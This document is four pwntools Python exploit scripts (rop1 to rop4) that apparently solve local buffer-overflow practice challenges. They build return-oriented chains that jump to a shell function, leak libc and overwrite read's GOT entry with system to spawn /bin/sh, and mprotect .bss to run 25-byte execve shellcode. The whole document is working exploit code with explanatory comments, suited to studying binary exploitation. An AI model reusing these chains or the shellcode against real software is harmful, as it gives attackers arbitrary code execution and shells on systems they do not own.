rop1.py


from pwn import *


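p = process("./rop1")

# Target address inside ./rop1 (fixed: the 0x0804xxxx range means no PIE).
# Presumably a function that spawns a shell - confirm against the disassembly.
shell = 0x080484A4

# 0x88 bytes of stack buffer plus 4 bytes of saved EBP sit between the start
# of the buffer and the saved return address; overwrite that return address
# with `shell`.
# bytes literals keep this working on Python 3 pwntools, where p32() returns
# bytes and "A" * n + p32(...) raises TypeError (on Python 2 b"" is just str).
padding = b"A" * (0x88 + 4)
payload = padding + p32(shell)

p.sendline(payload)
p.interactive()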



rop2.py


from pwn import *


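p = process("./rop2")

# Binary-side addresses (fixed, no PIE): PLT stubs, read's GOT slot, a
# pop;pop;pop;ret gadget that discards three call arguments, and an address
# that the chain passes to system() - presumably a "/bin/sh" string inside
# ./rop2; verify with `strings -t x` / ROPgadget before reusing.
write_plt = 0x80483d0
read_plt = 0x8048380
read_got = 0x804a000
pppr = 0x804859d
binsh = 0x08048610

# libc-specific: read@libc - system@libc for the libc this was written on.
# ASLR only shifts the base, so the difference stays valid for that build, but
# it must be recomputed for any other libc (e.g. from ELF("libc.so.6").symbols).
distance = 0xf7e66cb0 - 0xf7dbd200

# 0x88-byte buffer plus saved EBP, then the return address slot.
# bytes literals keep this working on Python 3 pwntools (p32() returns bytes).
padding = b"A" * (0x88 + 4)

# Stage 1: write(1, read_got, 4) -> leak read's runtime libc address.
leak = [p32(write_plt), p32(pppr), p32(1), p32(read_got), p32(4)]
# Stage 2: read(0, read_got, 4) -> lets us overwrite read's GOT slot.
overwrite = [p32(read_plt), p32(pppr), p32(0), p32(read_got), p32(4)]
# Stage 3: read@plt now jumps through the patched GOT slot, i.e. into system;
# "AAAA" is system's (never used) return address, binsh its argument.
trigger = [p32(read_plt), b"A" * 4, p32(binsh)]

payload = padding + b"".join(leak + overwrite + trigger)
p.sendline(payload)

# recvn() blocks until all 4 leak bytes are in; recv(4) may return a short
# read and u32() would then raise. Assumes the binary prints nothing before
# the leak - adjust if it has a banner/prompt.
read_libc = u32(p.recvn(4))
system = p32(read_libc - distance)
# Exactly the 4 bytes stage 2's read(0, read_got, 4) consumes; a trailing
# newline would only be left over in the shell's stdin.
p.send(system)
p.interactive()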



rop3.py

from pwn import *

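p = process("./rop3")

# Binary-side addresses (fixed, no PIE): PLT stubs, read's GOT slot, a
# pop;pop;pop;ret gadget that discards three call arguments, and a writable
# .bss slot. Unlike rop2 the chain supplies its own "/bin/sh" string by
# reading it into .bss.
write_plt = 0x80483a0
pppr = 0x804855d
read_plt = 0x8048360
read_got = 0x804a000
bss = 0x0804a020

# libc-specific: read@libc - system@libc for the libc this was written on;
# recompute for any other libc build (e.g. from ELF("libc.so.6").symbols).
distance = 0xf7e3acb0 - 0xf7d91200
# NUL-terminated so system() sees exactly "/bin/sh".
# bytes literals keep this working on Python 3 pwntools (p32() returns bytes).
binsh = b"/bin/sh\x00"

# 0x88-byte buffer plus saved EBP, then the return address slot.
padding = b"A" * (0x88 + 4)

# Stage 1: write(1, read_got, 4) -> leak read's runtime libc address.
leak = [p32(write_plt), p32(pppr), p32(1), p32(read_got), p32(4)]
# Stage 2: read(0, bss, 8) -> place "/bin/sh\0" in .bss.
store_binsh = [p32(read_plt), p32(pppr), p32(0), p32(bss), p32(len(binsh))]
# Stage 3: read(0, read_got, 4) -> overwrite read's GOT slot with system.
overwrite = [p32(read_plt), p32(pppr), p32(0), p32(read_got), p32(4)]
# Stage 4: read@plt now jumps into system; "AAAA" is system's return address,
# the .bss string its argument.
trigger = [p32(read_plt), b"A" * 4, p32(bss)]

payload = padding + b"".join(leak + store_binsh + overwrite + trigger)
p.sendline(payload)

# recvn() blocks until all 4 leak bytes are in; recv(4) may return a short
# read and u32() would then raise. Assumes nothing is printed before the leak.
read_libc = u32(p.recvn(4))
system = p32(read_libc - distance)
p.send(binsh)   # consumed by stage 2's read(0, bss, 8)
p.send(system)  # exactly the 4 bytes stage 3's read(0, read_got, 4) consumes
p.interactive()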



rop4.py


from pwn import *


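p = process("./rop4")

# Fixed addresses inside ./rop4. read and mprotect sit at 0x805xxxx, so the
# binary is presumably statically linked and no libc leak is needed.
# Renamed from read/mprotect so they no longer shadow the read()/write()
# helpers that `from pwn import *` brings into the namespace.
read_addr = 0x8053d20
mprotect_addr = 0x8054990
pppr = 0x80c5e4c  # pop;pop;pop;ret - discards three call arguments
# Page-aligned .bss address: mprotect() fails with EINVAL on an unaligned start.
bss = 0x80f0000

# 25-byte i386 execve("/bin//sh", ["/bin//sh"], NULL) via int 0x80.
# bytes literal keeps this working on Python 3 pwntools (p32() returns bytes).
shellCode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
)

# 0x88-byte buffer plus saved EBP, then the return address slot.
padding = b"A" * (0x88 + 4)

# Stage 1: read(0, bss, len(shellCode)) -> copy the shellcode into .bss.
stage_read = [p32(read_addr), p32(pppr), p32(0), p32(bss), p32(len(shellCode))]
# Stage 2: mprotect(bss, len, 7) -> PROT_READ|PROT_WRITE|PROT_EXEC on the page
# holding it (the kernel rounds the length up to a whole page). Required
# because .bss is not executable under NX.
stage_mprotect = [p32(mprotect_addr), p32(pppr), p32(bss), p32(len(shellCode)), p32(7)]
# Stage 3: "return" into the now-executable shellcode.
stage_jump = [p32(bss)]

payload = padding + b"".join(stage_read + stage_mprotect + stage_jump)
p.sendline(payload)
# Exactly the bytes stage 1's read() asked for; a trailing newline would only
# be left over in the shell's stdin.
p.send(shellCode)
p.interactive()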

